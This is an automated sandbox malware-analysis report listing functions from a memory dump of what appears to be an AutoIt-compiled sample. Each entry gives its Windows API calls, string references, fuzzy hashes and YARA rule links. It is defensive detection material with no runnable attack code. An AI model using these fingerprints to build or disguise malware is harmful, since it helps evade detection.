Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 91457ebbd041a039cc276b7947268ec109aeed6bb66ed4c2f4bbfc1ebc28e8cd
Instruction ID: 129eb5fe212be2ffee501c4325a8c6087152a44240207664324f1a260f73e281
Opcode Fuzzy Hash: 91457ebbd041a039cc276b7947268ec109aeed6bb66ed4c2f4bbfc1ebc28e8cd
Instruction Fuzzy Hash: 44E03971245228BADB215FA29C0DFDB7F5CEF117A1F008024B90CA6060CB75D584CBB0

Function 00DAB0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00DAB0C5
SetTextColor.GDI32(?,000000FF), ref: 00DAB0CF
SetBkMode.GDI32(?,00000001), ref: 00DAB0E4
GetStockObject.GDI32(00000005), ref: 00DAB0EC
GetWindowDC.USER32(?,00000000), ref: 00E0ECFA
GetPixel.GDI32(00000000,00000000,00000000), ref: 00E0ED07
GetPixel.GDI32(00000000,?,00000000), ref: 00E0ED20
GetPixel.GDI32(00000000,00000000,?), ref: 00E0ED39
GetPixel.GDI32(00000000,?,?), ref: 00E0ED59
ReleaseDC.USER32(?,00000000), ref: 00E0ED64

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 85eae39dc884a715bbb49e402b8ab0333cca63bdbba57fd6ba7e59465707c37f
Instruction ID: 71972863418db4b4c9971a077783a98cae5cdb2ed44d6eebda5824271000cbce
Opcode Fuzzy Hash: 85eae39dc884a715bbb49e402b8ab0333cca63bdbba57fd6ba7e59465707c37f
Instruction Fuzzy Hash: 9AE06D31204240BEEB211F75AC497C87F21AB06339F14C226F769680E2C3724984CB11

Function 00E0C0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00E0C0A0
GetDC.USER32(00000000), ref: 00E0C0AA
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E0C0C9
ReleaseDC.USER32 ref: 00E0C0E8

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: a4f74de5376e301687a60582c30806fe26937638c499316fb211a061702b3bff
Instruction ID: bd561523eba9d9310f5873cffdbbc3210dffc9ee2ef97280c671660075c65ef8
Opcode Fuzzy Hash: a4f74de5376e301687a60582c30806fe26937638c499316fb211a061702b3bff
Instruction Fuzzy Hash: FEE046B1508204EFDB005F72CC48AAD7BE9EB4C360F21C805FC4AAB250DBB99884CB20

Function 00E0C0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00E0C0B4
GetDC.USER32(00000000), ref: 00E0C0BE
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E0C0C9
ReleaseDC.USER32 ref: 00E0C0E8

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c3faeb8359495f3847d5f97528e33350fc2f0c8fbe775d7a876d0f25333bf145
Instruction ID: eeaa0df8b2ae85ca4739c086e086d5e543eff3102349be43d6004276acc0e889
Opcode Fuzzy Hash: c3faeb8359495f3847d5f97528e33350fc2f0c8fbe775d7a876d0f25333bf145
Instruction Fuzzy Hash: B8E046B1908204EFDB005F72CC486AD7BE9EB4C360F11C405F94AAB210DBB89984CB20

Function 00E12350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D967D0

Strings

DEFINE, xrefs: 00E1265C
>, xrefs: 00E12414

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memmove
String ID: >$DEFINE
API String ID: 4104443479-1664449232
Opcode ID: 724ede99e23c3697d8b6d82e12e9000d72e1f9b0bf2626f95c4f938ed0ed12bf
Instruction ID: 88652ce0d8a6bff2348f5392fce6a6a2c33a8e17067a98f6c613f59985818a7f
Opcode Fuzzy Hash: 724ede99e23c3697d8b6d82e12e9000d72e1f9b0bf2626f95c4f938ed0ed12bf
Instruction Fuzzy Hash: 93123975A0020ADFCF24CF98C8906EDB7B1FF48314F15915AE959AB291D734ED91CBA0

Function 00DCEAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00DCECA0

Strings

AutoIt3GUI, xrefs: 00DCEC18
Container, xrefs: 00DCEC1F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 963520aeff5002e6e10b10d6e359da3c44c56a548e573a3670bdef96f702a829
Instruction ID: 3dc83d0abd6e29b6a88a0be697443c8d6f3b11960b4944a422fb00ab572199da
Opcode Fuzzy Hash: 963520aeff5002e6e10b10d6e359da3c44c56a548e573a3670bdef96f702a829
Instruction Fuzzy Hash: C69107B4600702DFDB14DF68C885F6ABBA5FF49710B14856DF94ADB291EBB0E841CB60

Function 00DDE704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00D93BCF: _wcscpy.LIBCMT ref: 00D93BF2

Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519

__wcsnicmp.LIBCMT ref: 00DDE785
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00DDE84E

Strings

LPT, xrefs: 00DDE77F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 46a7f1d47a36c30a251475fc027f42817a53da4a3b7cd203411859cb0ead2ebd
Instruction ID: de4e3f821077fabf2b6fae92ab14e6c27a663ac345aeaf1cc17080ad5e71d9e6
Opcode Fuzzy Hash: 46a7f1d47a36c30a251475fc027f42817a53da4a3b7cd203411859cb0ead2ebd
Instruction Fuzzy Hash: CD616C75A00215AFCB14EB98C891EAEB7B9EF49310F04406AF546AF390DB70EE44DB70

Function 00D91B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00D91B83
GlobalMemoryStatusEx.KERNEL32 ref: 00D91B9C

Strings

@, xrefs: 00D91B91

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 3c653687f8a7fb69d93dd87853be03f349886f254b48cbb1a67774438ac83f7b
Instruction ID: 5fca5570b84f432604cdc7f2f692385879bf9ffb09f0c1104758e8bed808abf0
Opcode Fuzzy Hash: 3c653687f8a7fb69d93dd87853be03f349886f254b48cbb1a67774438ac83f7b
Instruction Fuzzy Hash: FE514771808744ABE720AF15D885BABBBE8FB9A354F81484DF1C8410A1EB71956DC763

Function 00DDCE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00D9417D: __fread_nolock.LIBCMT ref: 00D9419B

_wcscmp.LIBCMT ref: 00DDCF49
_wcscmp.LIBCMT ref: 00DDCF5C

Strings

FILE, xrefs: 00DDCE91

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 4b51d1c938045e712ae21feefb9ff705b44e0651198da79e0abe09b0028fa73a
Instruction ID: f7b91429d20bd2aa6c64ff76d47877b868bebc674f40b7af01e9a1af10dc9c2f
Opcode Fuzzy Hash: 4b51d1c938045e712ae21feefb9ff705b44e0651198da79e0abe09b0028fa73a
Instruction Fuzzy Hash: CC41A332A1421ABADF209BA4CC81FEF7BBADF89710F00046AF601F7191D6719A45C775

Function 00DFA578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00DFA668
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DFA67D

Strings

', xrefs: 00DFA5D1

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 30ca4094d18144b167f0c07d2c265cb61fe6da7f4f94a05745d8a1bbd83c2311
Instruction ID: 309835e3497d4d8f34d991b7ff042026de9ae192b5916cd65ef4dfd10f2fad44
Opcode Fuzzy Hash: 30ca4094d18144b167f0c07d2c265cb61fe6da7f4f94a05745d8a1bbd83c2311
Instruction Fuzzy Hash: 0741F8B5A003099FDB14CF69C881BEA7BB5FF09300F15446AEA19EB381D770A945CFA1

Function 00DE57D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DE57E7
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00DE581D

Strings

|, xrefs: 00DE580C

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: ff5883e85791329aa45f8a2cbf9be18fb5f1eb0d6c403e8bcf814c8fc49054d6
Instruction ID: add3c641946ebb27ac14ada9c94ff0bb9f5574b34fa05e0b22314eef2ff4c9ff
Opcode Fuzzy Hash: ff5883e85791329aa45f8a2cbf9be18fb5f1eb0d6c403e8bcf814c8fc49054d6
Instruction Fuzzy Hash: 8D311971800219EBCF11AFA1DC95EEE7FB8FF19344F104129E816A6166DB319A06DB70

Function 00DF9567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00DF961B
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00DF9657

Strings

static, xrefs: 00DF95B7

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: aac32e0873b9b1476e03f81fe4f68d2469ceb3d01a68d1043f3a07708706ce33
Instruction ID: 4d9c87862f03cbe62de99f2d66200e6ddb157b69a3b4d4a0f2eb9cd6ec1f6633
Opcode Fuzzy Hash: aac32e0873b9b1476e03f81fe4f68d2469ceb3d01a68d1043f3a07708706ce33
Instruction Fuzzy Hash: 68318D31900208AEEB109F64DC90BFBB7A9FF59764F059619F9A9D7190CA31AC81CB70

Function 00DD5B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DD5BE4
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00DD5C1F

Strings

0, xrefs: 00DD5BDD

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 67fe892da5155b31cc31decda283acfd597a76d1b8ea08d58f122d692f5bbaf3
Instruction ID: c80bfdd4f439b89954583d998a5e9998c83360e9eea4ac5fff16a0416825cdde
Opcode Fuzzy Hash: 67fe892da5155b31cc31decda283acfd597a76d1b8ea08d58f122d692f5bbaf3
Instruction Fuzzy Hash: 9531A731610705EBDB25CF9DE885BAEBBF5EF05350F1C401AE982962A4E7B09944CF30

Function 00DE6B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00DE6BDD

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

Strings

, $, xrefs: 00DE6C1D
AUTOITCALLVARIABLE%d, xrefs: 00DE6BCF

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 3522db56d73eb1d0595ba3ea610c92c56e8dd0cfccf2eb7514779b6951e6feaf
Instruction ID: 28c8c7befae1305b6d5d6b8d2257541426da0d2fb8b3bab047249e10e3e1076e
Opcode Fuzzy Hash: 3522db56d73eb1d0595ba3ea610c92c56e8dd0cfccf2eb7514779b6951e6feaf
Instruction Fuzzy Hash: FF215C31600218BACF11EFA5DC82EAE7BB5EF54740F104455F545AB282EB70EA42CBB1

Function 00DF91DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DF9269
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DF9274

Strings

Combobox, xrefs: 00DF9236

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 71645de1d8e45b1234f809454676545969247812aa091cc97e2dff8d4330a245
Instruction ID: fdb0f555b55f605df7c32050d0899427f8a16e63ba2dc4a3a3a60873d1c39eea
Opcode Fuzzy Hash: 71645de1d8e45b1234f809454676545969247812aa091cc97e2dff8d4330a245
Instruction Fuzzy Hash: B1119371B0020CBFEF258E54DC90FBB775AEB893A4F558125FA1897290D631DC5187B4

Function 00DF970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00DAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DAC657
Part of subcall function 00DAC619: GetStockObject.GDI32(00000011), ref: 00DAC66B
Part of subcall function 00DAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DAC675

GetWindowRect.USER32(00000000,?), ref: 00DF9775
GetSysColor.USER32(00000012), ref: 00DF978F

Strings

static, xrefs: 00DF9752

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: ea2cef8c3237f23d95354c879082e050ef36afca7531ffa447416fdfc4e74adc
Instruction ID: e55594af4045f86fb1e01b74bc72b07bc4691eb61bc056a4aaacca8800fdc4b3
Opcode Fuzzy Hash: ea2cef8c3237f23d95354c879082e050ef36afca7531ffa447416fdfc4e74adc
Instruction Fuzzy Hash: A7115972520209AFDB04DFB8CC45EFA7BA8EB08314F058528FA56E3150E634E851DB60

Function 00DF9424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00DF94A6
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00DF94B5

Strings

edit, xrefs: 00DF948A

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
